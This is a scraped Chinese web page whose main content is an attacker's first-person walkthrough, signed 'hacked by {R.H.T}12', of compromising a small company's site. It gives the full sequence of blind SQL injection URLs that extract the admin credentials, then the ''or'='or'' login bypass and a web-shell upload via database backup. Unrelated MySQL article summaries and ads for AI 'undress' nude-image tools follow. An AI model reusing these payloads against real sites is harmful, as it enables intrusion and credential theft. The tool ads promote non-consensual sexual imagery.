hacked by {R.H.T}12 http://www.xxx.com/NewsInfo.asp?id=95' 返回了错误页面。 http://www.xxx.com/NewsInfo.asp?id=95%20and%201=1 正确页面。 http://www.xxx.com/NewsInfo.asp?id=95%20and%201=2 返回了错误页面。 http://www.xxx.com/NewsInfo.asp?id=
hacked by {R.H.T}12
http://www.xxx.com/NewsInfo.asp?id=95'
返回了错误页面。
http://www.xxx.com/NewsInfo.asp?id=95%20and%201=1
正确页面。
http://www.xxx.com/NewsInfo.asp?id=95%20and%201=2
返回了错误页面。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists(selectcount(*)fromsysobjects)
返回了错误页面。确定ACCESS数据库。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin)
出错了。没有admin 的表名
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20vipusers)
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20account)
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin_userinfo)
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin_user)
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20manage)
都没有。。。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20manage_user)
有了。
猜出表名manage_user
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(password)%20from%20manage_user)>0
一下子就猜出了password的列名。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(user)%20from%20manage_user)>0
错误页面。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(manage_user)%20from%20manage_user)>0
错误页面。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(username)%20from%20manage_user)>0
正确页面。
整理下。
manage_user表。
列名为。
username
password
典型的垃圾站点。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)>5
出错了。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)
正确页面
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)=1
正确页面。只有一条记录数。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)>3
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)>5
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)=5
正确了。
管理员用户名字的数字有5位。
丫肯定用的admin
试下。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,1,1))%20from%20manage_user)=97
转换下。97就是a
我们问问第二位是不是d吧。
这个时候 刚好临近0点。突然掉线了。。。很纠结。。关键时刻阳痿了一样。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,2,1))%20from%20manage_user)=100
返回了正常页面。100就是d
第一位是a第二位是d一共5个字母。一般都是admin
这个时候 群里开始叫了。。大家刚才都掉线了。。有人说台湾黑客攻击。很快。有人说国外刚才也掉线了。。具体原因现在不明。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,3,1))%20from%20manage_user)=109
第三位是m
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,4,1))%20from%20manage_user)=105
第四位是i
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,5,1))%20from%20manage_user)=110
第五位是n
okey`admin
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(password)from%20manage_user)=6
直接正确。密码有6位。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>50
返回正常。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>70
返回错误
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>60
错了。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>65
错了
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)=63
错了
。。。。迷糊了。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)=55
对了。。。。
55转换下。是7
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,2,1))%20from%20manage_user)=55
第二位也是7
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,3,1))%20from%20manage_user)=55
第三位不是了。。
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,3,1))%20from%20manage_user)=59
对了。59转换下是;
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,4,1))%20from%20manage_user)=57
第四位。57转换下。是9
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,5,1))%20from%20manage_user)=62
第五位。转换下 62是>
http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,6,1))%20from%20manage_user)=62
第六位也是。。
总结下。
账号admin
密码77;9>>
OK 我们找后台。
http://www.xxx.com/manage/Login.asp
直接根据表名猜。猜对了。
用账号密码登陆。。。
提示账号密码不对~!
纠结。
难道不是这个后台。。
用工具扫了一下。。只扫出这么一个后台。
怎么办。
猜账号密码admin admin
不对。。这种傻逼已经很少了。
admin admin888
试了很久。。打算放弃了。
突然想起了万能密码。
'or'='or'
'or'='or'
进去了。。。。。。
我就操 他 女马 了。。。这个漏洞竟然还有。。。这什么垃圾站点。xxxxx邦汽车用品公司。。。
我怒了。提权。
看了下后台。在留言版那里看见有人插了一句话木马。我靠。删掉。
可以备份数据库。直接备份数据库传马。
OK拿下。
http://www.xxx.com/UploadFiles/2010491394386.asp
http://www.xxx.com/1.asp
点评:笔者写的很详细了,其中管理密码这里是典型的雷池加密,77;9>>=658598。
标签分类: 脚本渗透
Explain the InnoDB Buffer Pool and its importance for performance.Apr 19, 2025 am 12:24 AMInnoDBBufferPool reduces disk I/O by caching data and indexing pages, improving database performance. Its working principle includes: 1. Data reading: Read data from BufferPool; 2. Data writing: After modifying the data, write to BufferPool and refresh it to disk regularly; 3. Cache management: Use the LRU algorithm to manage cache pages; 4. Reading mechanism: Load adjacent data pages in advance. By sizing the BufferPool and using multiple instances, database performance can be optimized.
MySQL vs. Other Programming Languages: A ComparisonApr 19, 2025 am 12:22 AMCompared with other programming languages, MySQL is mainly used to store and manage data, while other languages such as Python, Java, and C are used for logical processing and application development. MySQL is known for its high performance, scalability and cross-platform support, suitable for data management needs, while other languages have advantages in their respective fields such as data analytics, enterprise applications, and system programming.
Learning MySQL: A Step-by-Step Guide for New UsersApr 19, 2025 am 12:19 AMMySQL is worth learning because it is a powerful open source database management system suitable for data storage, management and analysis. 1) MySQL is a relational database that uses SQL to operate data and is suitable for structured data management. 2) The SQL language is the key to interacting with MySQL and supports CRUD operations. 3) The working principle of MySQL includes client/server architecture, storage engine and query optimizer. 4) Basic usage includes creating databases and tables, and advanced usage involves joining tables using JOIN. 5) Common errors include syntax errors and permission issues, and debugging skills include checking syntax and using EXPLAIN commands. 6) Performance optimization involves the use of indexes, optimization of SQL statements and regular maintenance of databases.
MySQL: Essential Skills for Beginners to MasterApr 18, 2025 am 12:24 AMMySQL is suitable for beginners to learn database skills. 1. Install MySQL server and client tools. 2. Understand basic SQL queries, such as SELECT. 3. Master data operations: create tables, insert, update, and delete data. 4. Learn advanced skills: subquery and window functions. 5. Debugging and optimization: Check syntax, use indexes, avoid SELECT*, and use LIMIT.
MySQL: Structured Data and Relational DatabasesApr 18, 2025 am 12:22 AMMySQL efficiently manages structured data through table structure and SQL query, and implements inter-table relationships through foreign keys. 1. Define the data format and type when creating a table. 2. Use foreign keys to establish relationships between tables. 3. Improve performance through indexing and query optimization. 4. Regularly backup and monitor databases to ensure data security and performance optimization.
MySQL: Key Features and Capabilities ExplainedApr 18, 2025 am 12:17 AMMySQL is an open source relational database management system that is widely used in Web development. Its key features include: 1. Supports multiple storage engines, such as InnoDB and MyISAM, suitable for different scenarios; 2. Provides master-slave replication functions to facilitate load balancing and data backup; 3. Improve query efficiency through query optimization and index use.
The Purpose of SQL: Interacting with MySQL DatabasesApr 18, 2025 am 12:12 AMSQL is used to interact with MySQL database to realize data addition, deletion, modification, inspection and database design. 1) SQL performs data operations through SELECT, INSERT, UPDATE, DELETE statements; 2) Use CREATE, ALTER, DROP statements for database design and management; 3) Complex queries and data analysis are implemented through SQL to improve business decision-making efficiency.
MySQL for Beginners: Getting Started with Database ManagementApr 18, 2025 am 12:10 AMThe basic operations of MySQL include creating databases, tables, and using SQL to perform CRUD operations on data. 1. Create a database: CREATEDATABASEmy_first_db; 2. Create a table: CREATETABLEbooks(idINTAUTO_INCREMENTPRIMARYKEY, titleVARCHAR(100)NOTNULL, authorVARCHAR(100)NOTNULL, published_yearINT); 3. Insert data: INSERTINTObooks(title, author, published_year)VA
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Dreamweaver Mac version
Visual web development tools
Notepad++7.3.1
Easy-to-use and free code editor
mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),
Safe Exam Browser
Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.
SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.
